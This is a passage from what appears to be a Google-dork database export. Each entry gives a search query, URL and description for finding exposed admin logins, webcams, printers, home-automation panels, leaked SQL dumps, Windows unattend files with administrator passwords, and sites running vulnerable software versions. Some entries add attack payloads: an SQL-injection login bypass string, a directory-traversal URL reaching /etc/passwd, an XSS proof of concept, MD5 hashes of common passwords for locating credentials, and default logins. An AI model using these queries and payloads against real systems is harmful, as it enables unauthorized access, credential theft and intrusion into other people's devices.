It has video input ports (1 S signal port, 2 composite signal ports) and PCMCIA Type II slots built in.[descr]] [[url]http://www.google.com/search?q=allintitle:Brains,+Corp.+camera[url]] [[dork]allintitle:Brains, Corp. camera[dork]] [end][1060]] [[start][1061] [[title]"Traffic Analysis for" "RMON Port * on unit *"[title]] [[descr]List of RMON ports produced by MRTG, which is a network traffic analysis tool. See also #198.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=%22Traffic+Analysis+for%22+%22RMON+Port+*+on+unit+*%22&btnG=Search[url]] [[dork]"Traffic Analysis for" "RMON Port * on unit *"[dork]] [end][1061]] [[start][1062] [[title]allintitle:aspjar.com guestbook[[title]] [[descr]"An input validation vulnerability was reported in the ASPJar guestbook. A remote user can gain administrative access and can delete guestbook messages.

The '/admin/login.asp' script does not properly validate user-supplied input in the password field. A remote user can supply the following characters in password field to inject SQL commands and be authenticated as the administrator:"

' or ''='

I also found another vulnerability that hasn't been documented anywhere. Using the above search to find aspjar guestbooks, appending the guestbook directory with /data/guest.mdb will give you a database containing the plaintext username and password for the guestbook admin and all entries in the guestbook, including IP addresses of users.

(This company is no longer in business and the software is no longer being updated, so versions shouldn't matter)[descr]] [[url]http://www.google.com/search?q=allintitle:aspjar.com+guestbook[url]] [[dork]allintitle:aspjar.com guestbook[dork]] [end][1062]] [[start][1063] [[title]filetype:sql ("values * MD5" | "values * password" | "values * encrypt")[[title]] [[descr]Locate insert statements making use of some built-in function to encrypt a password. PASSWORD(), ENCRYPT() and MD5() are searched.
[descr]] [[url]http://www.google.com/search?num=100&q=filetype%3Asql+%28%22values+%2A+MD5+%2A%22+%7C+%22values+%2A+password+%2A%22+%7C+%22values+%2A+encrypt+%2A%22%29[url]] [[dork]filetype:sql ("values * MD5 *" | "values * password *" | "values * encrypt *")[dork]] [end][1063]] [[start][1064] [[title]filetype:sql ("passwd values" | "password values" | "pass values" )[[title]] [[descr]Find insert statements where the field (or table name) preceding the operator VALUES will be 'password', 'passwd' or 'pass'. The rest of the statement should contain an encrypted or plaintext password.

An attacker can use these files to acquire database permissions that normally would not be given to the masses.[descr]] [[url]http://www.google.com/search?num=100&q=+filetype%3Asql+%28%22passwd+values+%2A%2A%2A%2A%22+%7C+%22password+values+%2A%2A%2A%2A%22+%7C+%22pass+values+%2A%2A%2A%2A%22+%29[url]] [[dork] filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )[dork]] [end][1064]] [[start][1065] [[title]"powered by andromeda version" (filetype:php | filetype:asp)[[title]] [[descr]Andromeda MP3 server for Windows, Linux, and Mac OS X.[descr]] [[url]http://www.google.com/search?num=100&q=%22powered+by+andromeda+version%22+%28filetype%3Aphp+%7C+filetype%3Aasp%29[url]] [[dork]"powered by andromeda version" (filetype:php | filetype:asp)[dork]] [end][1065]] [[start][1066] [[title](inurl:81-cobalt | inurl:cgi-bin/.cobalt)[[title]] [[descr]Cobalt RaQ internal pages[descr]] [[url]http://www.google.com/search?q=(inurl:81-cobalt+%7C+inurl:cgi-bin/.cobalt)[url]] [[dork](inurl:81-cobalt | inurl:cgi-bin/.cobalt)[dork]] [end][1066]] [[start][1067] [[title]inurl:WCP_USER[[title]] [[descr]WebConnect is client-server based software that provides secure browser-based emulation to mainframe, midrange and UNIX systems[descr]] [[url]http://www.google.com/search?q=inurl%3AWCP_USER[url]] [[dork]inurl:WCP_USER[dork]] [end][1067]] [[start][1075] [[title]intitle:"Kurant Corporation StoreSense" filetype:bok[[title]] [[descr]These are Kurant StoreSense admin logon pages.[descr]] [[url]http://www.google.com/search?hl=en&q=filetype%3Abok+intitle%3A%22Kurant+Corporation+StoreSense%22&filter=0[url]] [[dork]filetype:bok intitle:"Kurant Corporation StoreSense"[dork]] [end][1075]] [[start][1077] [[title]intitle:"Dell Laser Printer" ews[[title]] [[descr]Finds Dell's printers with EWS.

EWS: Embedded Web Server technology enables the use of a standard web browser to manage many aspects of the printer, for example viewing consumable life, configuring network parameters, viewing serial number information, printer usage etc.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Dell+Laser+Printer%22+ews[url]] [[dork]intitle:"Dell Laser Printer" ews[dork]] [end][1077]] [[start][1079] [[title]intitle:"active webcam page"[title]] [[descr]Searches for "Active Webcam" feeds on websites, a popular USB webcam interface.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22active+webcam+page%22[url]] [[dork]intitle:"active webcam page"[dork]] [end][1079]] [[start][1080] [[title]"powered by CubeCart 2.0"[title]] [[descr]This search reveals an alarming number of servers running versions of Brooky CubeCart that are reported to be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied data.

...susceptible to a remote directory traversal vulnerability
...cross-site scripting vulnerability may allow for theft of cookie-based authentication credentials or other attacks.

An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/index.php?&language=../../../../../../../../etc/passwd
http://www.example.com/index.php?&language=var%20test_variable=31337;alert(test_variable);

Vulnerability was published 2-14-2005
http://www.securityfocus.com/bid/12549/[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&safe=off&c2coff=1&as_qdr=all&q=+%22powered+by+CubeCart+2.0%22[url]] [[dork] "powered by CubeCart 2.0"[dork]] [end][1080]] [[start][1082] [[title]intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."[title]] [[descr]People who have foolishly published an audit of their machine(s) on the net with some server info as well[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1082]] [[start][1084] [[title]filetype:ora tnsnames[[title]] [[descr]This searches for tnsnames files. This is an Oracle configuration file that sets up connection strings for someone's Oracle client to contact the various databases it is managing. This file contains ports, IPs and server names of these database machines. What I think is more telling is that in most cases, this file is stored in Oracle's installation directory which can probably be more telling.[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=filetype%3Aora+tnsnames[url]] [[dork]filetype:ora tnsnames[dork]] [end][1084]] [[start][1085] [[title]intitle:"SuSE Linux Openexchange Server" "Please activate JavaScript!"[title]] [[descr]Another way to find the web administration portal of Linux Openexchange servers.[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22SuSE+Linux+Openexchange+Server%22+%22Please+activate+JavaScript%21%22[url]] [[dork]intitle:"SuSE Linux Openexchange Server" "Please activate JavaScript!"[dork]] [end][1085]] [[start][1087] [[title]inurl:"suse/login.pl"[title]] [[descr]More SuSE login portals, mostly Openexchange.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%22suse%2Flogin.pl%22[url]] [[dork]inurl:"suse/login.pl"[dork]] [end][1087]] [[start][1091] [[title]intitle:HomeSeer.Web.Control | Home.Status.Events.Log[[title]] [[descr]HomeSeer (http://www.homeseer.com/) 
provides a well-known home automation solution (software + hardware).

This dork will find web interfaces of homeseer.[descr]] [[url]http://www.google.com/search?num=100&q=intitle%3AHomeSeer.Web.Control+%7C+Home.Status.Events.Log[url]] [[dork]intitle:HomeSeer.Web.Control | Home.Status.Events.Log[dork]] [end][1091]] [[start][1093] [[title]"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3[[title]] [[descr]this is a mod of one of the previous queries posted in here. the basic thing is, to add this:
21232f297a57a5a743894a0e4a801fc3
to your query, that originally results in a username list with an MD5 encrypted password.

this one finds mysql dumps for users whose passwords
are "admin" :)

the "21232f297a57a5a743894a0e4a801fc3" is the md5 result for "admin"

you can try it with other queries on this site.
use also:
63a9f0ea7bb98050796b649e85481845 for root
098f6bcd4621d373cade4e832627b4f6 for test
3c3662bcb661d6de679c636744c66b62 for sex
f561aaf6ef0bf14d4208bb46a4ccb3ad for xxx

if you get lucky, you'll get a username and an encrypted password, which is the one above that you used.

remember that this works for all files that contain plaintext usernames and md5 encrypted passwords. use this technique with other queries that you'll find here

uff... I hope I made myself clear.[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22%23mysql+dump%22+filetype%3Asql+21232f297a57a5a743894a0e4a801fc3&btnG=Search[url]] [[dork]"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3[dork]] [end][1093]] [[start][1096] [[title]Powered.by.RaidenHTTPD intitle:index.of[[title]] [[descr]RaidenHTTPD ( http://www.raidenhttpd.com/en ) is full featured web server software for Windows[descr]] [[url]http://www.google.com/search?num=100&q=Powered.by.RaidenHTTPD+intitle%3Aindex.of[url]] [[dork]Powered.by.RaidenHTTPD intitle:index.of[dork]] [end][1096]] [[start][1097] [[title]filetype:ini Desktop.ini intext:mydocs.dll[[title]] [[descr]This dork finds any web-shared Windows folder inside My Docs. You can change the end bit "intext:mydocs.dll" by looking inside any of your own folders on your PC, looking for the desktop.ini file and adding some of the information to the query. For another example - Shell Folders (Favourites etc)

filetype:ini Desktop.ini intext:shell32.dll

Enjoy[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&as_qdr=all&q=filetype%3Aini+Desktop.ini+intext%3Amydocs.dll&btnG=Search[url]] [[dork]filetype:ini Desktop.ini intext:mydocs.dll[dork]] [end][1097]] [[start][1098] [[title]allinurl:wps/portal/ login[[title]] [[descr]Login to IBM WebSphere Portal.
You may find portals using the standard administrator user/password, which gives you complete access to the application itself.

[descr]] [[url]http://www.google.com/search?q=allinurl%3Awps%2Fportal%2F+login&btnG=Cerca&meta=[url]] [[dork]allinurl:wps/portal/ login[dork]] [end][1098]] [[start][1099] [[title]intitle:"phpPgAdmin - Login" Language[[title]] [[descr]phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services[descr]] [[url]http://www.google.com/search?q=intitle:%22phpPgAdmin+-+Login%22+Language&hl=en&lr=&c2coff=1&start=10&sa=N[url]] [[dork]intitle:"phpPgAdmin - Login" Language[dork]] [end][1099]] [[start][1101] [[title]powered.by.modIndex.0.0[[title]] [[descr]Modindex replaces the default Apache directory indexer with one that is a little more user friendly.[descr]] [[url]http://www.google.com/search?num=100&q=powered.by.modIndex.0.0[url]] [[dork]powered.by.modIndex.0.0[dork]] [end][1101]] [[start][1102] [[title]intitle:asterisk.management.portal web-access[[title]] [[descr]Coalescent Systems Inc. launched The Asterisk Management Portal project to bring together best-of-breed applications to produce a "canned" (but fully functional) turn-key small business phone system based on The Asterisk Open Source PBX. [descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1102]] [[start][1103] [[title]intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists[[title]] [[descr]Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time. 
[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22Flash+Operator+Panel%22+-ext%3Aphp+-wiki+-cms+-inurl%3Aasternic+-inurl%3Asip+-intitle[url]] [[dork]intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle[dork]] [end][1103]] [[start][1104] [[title]ext:txt inurl:unattend.txt[[title]] [[descr]unattend.txt is used to drive unattended MS Windows installations. The files contain all information for a Windows installation, including Administrator passwords, IP addresses and product IDs. [descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=ext%3Atxt+inurl%3Aunattend.txt&btnG=Search[url]] [[dork]ext:txt inurl:unattend.txt[dork]] [end][1104]] [[start][1105] [[title]filetype:inf sysprep[[title]] [[descr]Sysprep is used to drive unattended MS Windows installations. The files contain all information for a Windows installation, including Administrator passwords, IP addresses and product IDs. [descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=filetype%3Ainf+sysprep+&btnG=Search[url]] [[dork]filetype:inf sysprep [dork]] [end][1105]] [[start][1106] [[title]intitle:"Service Managed Gateway Login"[title]] [[descr]Service Managed Gateway from VirtualAccess login page[descr]] [[url]http://www.google.com/search?q=intitle:%22Service+Managed+Gateway+Login%22+&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]] [[dork]intitle:"Service Managed Gateway Login" [dork]] [end][1106]] [[start][1107] [[title]"Powered by UebiMiau" -site:sourceforge.net[[title]] [[descr]UebiMiau is a simple, yet efficient cross-platform POP3/IMAP mail reader written in PHP. 
It has many features, such as: Folders, View and Send Attachments, Preferences, Search, Quota Limit[descr]] [[url]http://www.google.com/search?q=%22Powered+by+UebiMiau%22+-site%3Asourceforge.net[url]] [[dork]"Powered by UebiMiau" -site:sourceforge.net[dork]] [end][1107]] [[start][1108] [[title]inurl:webmail./index.pl "Interface"[title]] [[descr]Webmail system which reveals that the website is hosted by vDeck[descr]] [[url]http://www.google.com/search?q=inurl%3Awebmail.%2Findex.pl+%22Interface%22[url]] [[dork]inurl:webmail./index.pl "Interface"[dork]] [end][1108]] [[start][1109] [[title]intitle:"BorderWare MXtreme Mail Firewall Login"[title]] [[descr]BorderWare MXtreme Mail firewall
MXtreme is a hardened appliance with a highly robust mail transfer agent (MTA) and email gateway that prevents email-borne threats from entering your network while protecting against spam and viruses. [descr]] [[url]http://www.google.com/search?q=intitle:%22BorderWare+MXtreme+Mail+Firewall+Login%22[url]] [[dork]intitle:"BorderWare MXtreme Mail Firewall Login"[dork]] [end][1109]] [[start][1110] [[title]intitle:"actiontec" main setup status "Copyright 2001 Actiontec Electronics Inc"[title]] [[descr]Actiontec Routers.[descr]] [[url]http://www.google.com/search?q=intitle:%22actiontec%22+main+setup+status+%22Copyright+2001+Actiontec+Electronics+Inc%22&hl=en&lr=&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]] [[dork]intitle:"actiontec" main setup status "Copyright 2001 Actiontec Electronics Inc"[dork]] [end][1110]] [[start][1111] [[title]intitle:"Point. Click. Edit."[title]] [[descr]'Point and Click' WYSIWYG web site building tool[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Point.+Click.+Edit.%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]] [[dork]intitle:"Point. Click. Edit."[dork]] [end][1111]] [[start][1112] [[title]Powered.by:.vBulletin.Version ...3.0.6[[title]] [[descr]vBulletin is reported prone to an arbitrary PHP script code execution vulnerability. The issue is reported to exist due to a lack of sufficient input sanitization performed on user-supplied data before this data is included in a dynamically generated script

http://www.securityfocus.com/bid/12622/info/[descr]] [[url]http://www.google.com/search?q=Powered.by%3A.vBulletin.Version+...3.0.6&btnG=Search[url]] [[dork]Powered.by:.vBulletin.Version ...3.0.6[dork]] [end][1112]] [[start][1113] [[title]intitle:"VMware Management Interface:" inurl:"vmware/en/"[title]] [[descr]VMware GSX Server is enterprise-class virtual infrastructure software for x86-based servers. It is ideal for server consolidation, disaster recovery and streamlining software development processes.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22VMware+Management+Interface%3A%22+inurl%3A%22vmware%2Fen%2F%22[url]] [[dork]intitle:"VMware Management Interface:" inurl:"vmware/en/"[dork]] [end][1113]] [[start][1114] [[title]filetype:php intitle:"paNews v2.0b4"[title]] [[descr]PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script.

http://www.securityfocus.com/bid/12611[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=filetype%3Aphp+intitle%3A%22paNews+v2.0b4%22+&btnG=Search[url]] [[dork]filetype:php intitle:"paNews v2.0b4" [dork]] [end][1114]] [[start][1115] [[title]"Webthru User Login"[title]] [[descr]Samsung webthru cameras[descr]] [[url]http://www.google.com/search?q=%22Webthru+User+Login%22&hl=en&lr=&filter=0[url]] [[dork]"Webthru User Login"[dork]] [end][1115]] [[start][1116] [[title]inurl:x10/index.cgi[[title]] [[descr]Scott Crevier's X-10 home automation Web Interface.
Allows an attacker to control home appliances from a web site.
[descr]] [[url]http://www.google.com/search?q=inurl:x10/index.cgi&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]] [[dork]inurl:x10/index.cgi[dork]] [end][1116]] [[start][1117] [[title]ext:cgi intitle:"control panel" "enter your owner password to continue!"[title]] [[descr]Free Perl Guestbook (FPG) administration page. Only a password is needed to log on.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=ext%3Acgi++intitle%3A%22control+panel%22+%22enter+your+owner+password+to+continue%21%22&btnG=Search[url]] [[dork]ext:cgi intitle:"control panel" "enter your owner password to continue!"[dork]] [end][1117]] [[start][1118] [[title]intitle:"ListMail Login" admin -demo[[title]] [[descr]ListMail mailing list manager admin logon[descr]] [[url]http://www.google.com/search?q=intitle:%22ListMail+Login%22+admin+-demo&filter=0[url]] [[dork]intitle:"ListMail Login" admin -demo[dork]] [end][1118]] [[start][1119] [[title]intitle:"Test Page for the Apache HTTP Server on Fedora Core" intext:"Fedora Core Test Page"[title]] [[descr]Apache 2.0 on Fedora Core test page [descr]] [[url]http://www.google.com/search?q=intitle:%22Test+Page+for+the+Apache+HTTP+Server+on+Fedora+Core%22+intext:%22Fedora+Core+Test+Page%22&filter=0[url]] [[dork]intitle:"Test Page for the Apache HTTP Server on Fedora Core" intext:"Fedora Core Test Page"[dork]] [end][1119]] [[start][1122] [[title]wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin[[title]] [[descr]This is a filtered version of previous 'inurl:passwd' searches, focusing on WWWBoard [1]. There are different crypt functions involved [2], but the default username and password is 'WebAdmin:WebBoard' without the quotes. This is my first Googledork entry, so be gentle :)

Funny enough, many of the DES hashes seem to use a salt of "ae". I tried just using this string along with the inurl portion, but it seemed to inappropriately restrict the search. Couple this with [3] and, um, yeah.

cykyc

[1]http://www.scriptarchive.com/wwwboard.html
[2]http://www.scriptarchive.com/faq/wwwboard.html#q2
[3]http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=625[descr]] [[url]http://www.google.com/search?q=wwwboard+WebAdmin++inurl:passwd.txt+wwwboard%7Cwebadmin+&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin [dork]] [end][1122]] [[start][1126] [[title]"Powered by: vBulletin Version 1.1.5"[title]] [[descr]This google dork reveals vulnerable message boards. It works for all vBulletin versions up to 2.0 beta 2. To try other versions, just change the version number in the dork.
These vulnerable message boards allow remote code execution.
More on this can be found here:
http://www.securiteam.com/securitynews/5IP0B203PI.html

it has a fairly good explanation of the exploits incorporated with these versions.
[descr]] [[url]http://www.google.com/search?q=%22Powered+by%3A+vBulletin+Version+1.1.5%22[url]] [[dork]"Powered by: vBulletin Version 1.1.5"[dork]] [end][1126]] [[start][1130] [[title]intitle:index.of /maildir/new/[[title]] [[descr]Search gives you a mailbox dir. Contains a lot of mail.[descr]] [[url]http://www.google.com/search?q=intitle%3Aindex.of+%2Fmaildir%2Fnew%2F[url]] [[dork]intitle:index.of /maildir/new/[dork]] [end][1130]] [[start][1133] [[title]intitle:asterisk.management.portal web-access[[title]] [[descr]VOXBOX Asterisk web management. Allows you to manage Asterisk configuration such as calls and SIP settings.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1133]] [[start][1134] [[title]intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists[[title]] [[descr]Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time. [descr]] [[url]http://www.google.com/search?q=intitle%3A%22Flash+Operator+Panel%22+-ext%3Aphp+-wiki+-cms+-inurl%3Aasternic+-inurl%3Asip+-intitle%3AANNOUNCE+-inurl%3Alists+&btnG=Search[url]] [[dork]intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists [dork]] [end][1134]] [[start][1135] [[title]"Powered by Coppermine Photo Gallery" ( "v1.2.2 b" | "v1.2.1" | "v1.2" | "v1.1" | "v1.0")[[title]] [[descr]Reportedly Coppermine Photo Gallery is prone to multiple input validation vulnerabilities, some of which may lead to arbitrary command execution. These issues are due to the application failing to properly sanitize and validate user-supplied input prior to using it in dynamic content and system command execution function calls.

These issues may be exploited to steal cookie based authentication credentials, map the application root directory of the affected application, execute arbitrary commands and include arbitrary files. Other attacks are also possible.

http://www.securityfocus.com/bid/10253/[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Coppermine+Photo+Gallery%22+%28+%22v1.2.2+b%22+%7C+%22v1.2.1%22+%7C+%22v1.2%22+%7C+%22v1.1%22+%7C+%22v1.0%22%29&btnG=Se[url]] [[dork]"Powered by Coppermine Photo Gallery" ( "v1.2.2 b" | "v1.2.1" | "v1.2" | "v1.1" | "v1.0")[dork]] [end][1135]] [[start][1137] [[title]intitle:"IPC@CHIP Infopage"[title]] [[descr]web server detection for IPC@chip embedded webserver
The dork uses the webserver's infopage which reveals some very interesting information.
See securityfocus advisory for more info: http://www.securityfocus.com/bid/2767
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22IPC%40CHIP+Infopage%22+&btnG=Search[url]] [[dork]intitle:"IPC@CHIP Infopage" [dork]] [end][1137]] [[start][1138] [[title]"APC Console Port Management Server" intitle:"Console Port Management Server"[title]] [[descr]APC Remote console server
APC's Console Port Servers are 0U and 1U devices that enable remote management of Linux, Unix, Sun and Windows 2003 servers and other devices. They provide access, activity monitoring, event logging, and facilitate automated configuration. Maintain secure communication with devices in your data center or branch offices independent of network availability. [descr]] [[url]http://www.google.com/search?q=%22APC+Console+Port+Management+Server%22+intitle%3A%22Console+Port+Management+Server%22&btnG=Search[url]] [[dork]"APC Console Port Management Server" intitle:"Console Port Management Server"[dork]] [end][1138]] [[start][1139] [[title]thttpd webserver[[title]] [[descr]thttpd is a webserver written in C and should compile and run on most Unix-like systems. As of version 2.20 or later, thttpd is known to build and run on the following platforms, usually on at least recent platform versions:
* FreeBSD
* NetBSD
* BSD/OS
* Solaris
* Tru64 / DIGITAL UNIX / OSF/1
* SunOS
* Linux
* HP-UX
* MacOS X
* UnixWare
* AMIGAOS
* NCR MP-RAS BASE 3.02 (EISA/MCA)
* Sega Dreamcast
* Compaq iPaq 3765
* Windows 2000/XP (port of 2.07 only)
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Index+of+*%22+mode++links++bytes++last-changed++name[url]] [[dork]intitle:"Index of *" mode links bytes last-changed name[dork]] [end][1139]] [[start][1140] [[title]WebLog Referrers[[title]] [[descr]ExpressionEngine is a modular, flexible, feature-packed web publishing system that adapts to a broad range of needs.[descr]] [[url]http://www.google.com/search?q=allinurl:%22weblog/referrers%22&sourceid=opera&num=0&ie=utf-8&oe=utf-8[url]] [[dork]allinurl:"weblog/referrers"[dork]] [end][1140]] [[start][1143] [[title]yaws.*.server.at[[title]] [[descr]YAWS (http://yaws.hyber.org), Yet Another Web Server, is a high performance HTTP 1.1 webserver.
Yaws is entirely written in Erlang; furthermore, it is a multithreaded webserver where one Erlang lightweight process is used to handle each client.[descr]] [[url]http://www.google.com/search?q=yaws.%2A.server.at[url]] [[dork]yaws.*.server.at[dork]] [end][1143]] [[start][1144] [[title]intitle:endymion.saké.mail.login.page | inurl:sake.servlet[[title]] [[descr]Saké Mail is a servlet-based web email system, designed for scaling to large numbers of concurrent users. Intended for large universities or enterprise-level mail systems[descr]] [[url]http://www.google.com/search?q=intitle%3Aendymion.sak%C3%A9.mail.login.page+%7C+inurl%3Asake.servlet&num=100[url]] [[dork]intitle:endymion.saké.mail.login.page | inurl:sake.servlet[dork]] [end][1144]] [[start][1145] [[title]inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0[[title]] [[descr]eHealth, a network management solution, enables its users to manage performance and availability of LANs, WANs, routers, Switches, Frame Relay, ATM, Remote Access Equipment, QoS, Wireless LAN, DAL, Voice and Cable technologies.[descr]] [[url]http://www.google.com/search?num=100&q=inurl%3Abin.welcome.sh+%7C+inurl%3Abin.welcome.bat+%7C+intitle%3AeHealth.5.0[url]] [[dork]inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0[dork]] [end][1145]] [[start][1147] [[title]powered.by.instaBoard.version.1.3[[title]] [[descr]InstaBoard is a ColdFusion forum solution. Version 1.3 is vulnerable to SQL injection.
Bugtraq ID 7338[descr]] [[url]http://www.google.com/search?num=100&q=powered.by.instaBoard.version.1.3[url]] [[dork]powered.by.instaBoard.version.1.3[dork]] [end][1147]] [[start][1149] [[title]intitle:"OfficeConnect Wireless 11g Access Point" "Checking your browser"[title]] [[descr]OfficeConnect Wireless 11g Access Point[descr]] [[url]http://www.google.com/search?q=intitle:%22OfficeConnect+Wireless+11g+Access+Point%22+%22Checking+your+browser%22&hl=en&lr=&filter=0[url]] [[dork]intitle:"OfficeConnect Wireless 11g Access Point" "Checking your browser"[dork]] [end][1149]] [[start][1150] [[title]intitle:"Lexmark *" inurl:port_0[[title]] [[descr]Lexmark printers (4 models)[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Lexmark+*%22+inurl%3Aport_0&filter=0[url]] [[dork]intitle:"Lexmark *" inurl:port_0[dork]] [end][1150]] [[start][1151] [[title]inurl:/en/help.cgi "ID=*"[title]] [[descr]Aficio printers (this search locates the help pages)[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%2Fen%2Fhelp.cgi+%22ID%3D*%22[url]] [[dork]inurl:/en/help.cgi "ID=*"[dork]] [end][1151]] [[start][1152] [[title]intitle:jdewshlp "Welcome to the Embedded Web Server!"[title]] [[descr]HP Officejet help page. Remove "help.html" for main page.[descr]] [[url]http://www.google.com/search?q=intitle%3Ajdewshlp+%22Welcome+to+the+Embedded+Web+Server%21%22[url]] [[dork]intitle:jdewshlp "Welcome to the Embedded Web Server!"[dork]] [end][1152]] [[start][1153] [[title]"display printer status" intitle:"Home"[title]] [[descr]Xerox Phaser printers.[descr]] [[url]http://www.google.com/search?q=%22display+printer+status%22+intitle:%22Home%22&filter=0[url]] [[dork]"display printer status" intitle:"Home"[dork]] [end][1153]] [[start][1155] [[title]inurl:JPGLogin.htm[[title]] [[descr]webserver detection for GeoHttpServer, the page is the login page or guest cam. 
Don't ask why these are mostly doggy cams, weirdness.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3AJPGLogin.htm[url]] [[dork]inurl:JPGLogin.htm[dork]] [end][1155]] [[start][1156] [[title]intitle:"Welcome to Windows Small Business Server 2003"[title]] [[descr]Another way to find Small Business Server 2003; for more results check the dork by JimmyNeutron (id=763).[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22Welcome+to+Windows+Small+Business+Server+2003%22&num=100[url]] [[dork]intitle:"Welcome to Windows Small Business Server 2003"[dork]] [end][1156]] [[start][1157] [[title]intitle:"OfficeConnect Cable/DSL Gateway" intext:"Checking your browser"[title]] [[descr]This query allows you to find OfficeConnect Cable/DSL Gateways, by locating the browser-check page that Google has indexed. The browser-check page leads to a login page, which kindly informs you of the default password.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22OfficeConnect+Cable%2FDSL+Gateway%22+intext%3A%22Checking+your+browser%22[url]] [[dork]intitle:"OfficeConnect Cable/DSL Gateway" intext:"Checking your browser"[dork]] [end][1157]] [[start][1160] [[title]intext:"Powered by phpBB 2.0.13" inurl:"cal_view_month.php"|inurl:"downloads.php"[title]] [[descr]phpBB 2.0.13 with the Calendar Pro MOD installed is vulnerable to SQL injection attacks. An attacker can download the MD5 hashes from the account database without authorization.[descr]] [[url]http://www.google.com/search?q=intext%3A%22Powered+by+phpBB+2.0.13%22+inurl%3A%22cal_view_month.php%22%7Cinurl%3A%22downloads.php%22[url]] [[dork]intext:"Powered by phpBB 2.0.13" inurl:"cal_view_month.php"|inurl:"downloads.php"[dork]] [end][1160]] [[start][1162] [[title]Netscape Application Server Error page[[title]] [[descr]This error message highlights potentially unpatched or misconfigured Netscape Application Server or iPlanet application servers. 
An inquisitive mind would probably want to manually alter the URLs returned by this query, just to see what other, more informative messages might be revealed. As these servers are already exhibiting a misconfiguration, this could lead to other vulnerabilities being discovered.

Finally, these servers are running software that is a few years old now. An attacker may feel that because of this, there's a strong possibility that they're not patched-up fully either, making them potentially vulnerable to known exploits.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1162]] [[start][1163] [[title]"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"[title]] [[descr]you can find many servers infected with sql injection[descr]] [[url]http://www.google.com/search?q=%22%5BSQL+Server+Driver%5D%5BSQL+Server%5DLine+1:+Incorrect+syntax+near%22+-forum+-thread+-showthread&hl=en&lr=&c2coff=1&safe=off&client=firefox-a&rls=org.mozilla:en-US:[url]] [[dork]"[SQL Server Driver][SQL Server]Line 1: Incorrect syntax near" -forum -thread -showthread[dork]] [end][1163]] [[start][1165] [[title]intext:"vbulletin" inurl:admincp[[title]] [[descr]vBulletin Admin Control Panel[descr]] [[url]http://www.google.com/search?q=intext%3A%22vbulletin%22+inurl%3Aadmincp&btnG=Search&hl=en&lr=[url]] [[dork]intext:"vbulletin" inurl:admincp[dork]] [end][1165]] [[start][1167] [[title]intitle:"inc. vpn 3000 concentrator"[title]] [[descr]This search will show the login page for Cisco VPN 3000 concentrators. Since the default user id and password are readily available on the Cisco website, an out-of-the-box or test device could be wide open to mischief.[descr]] 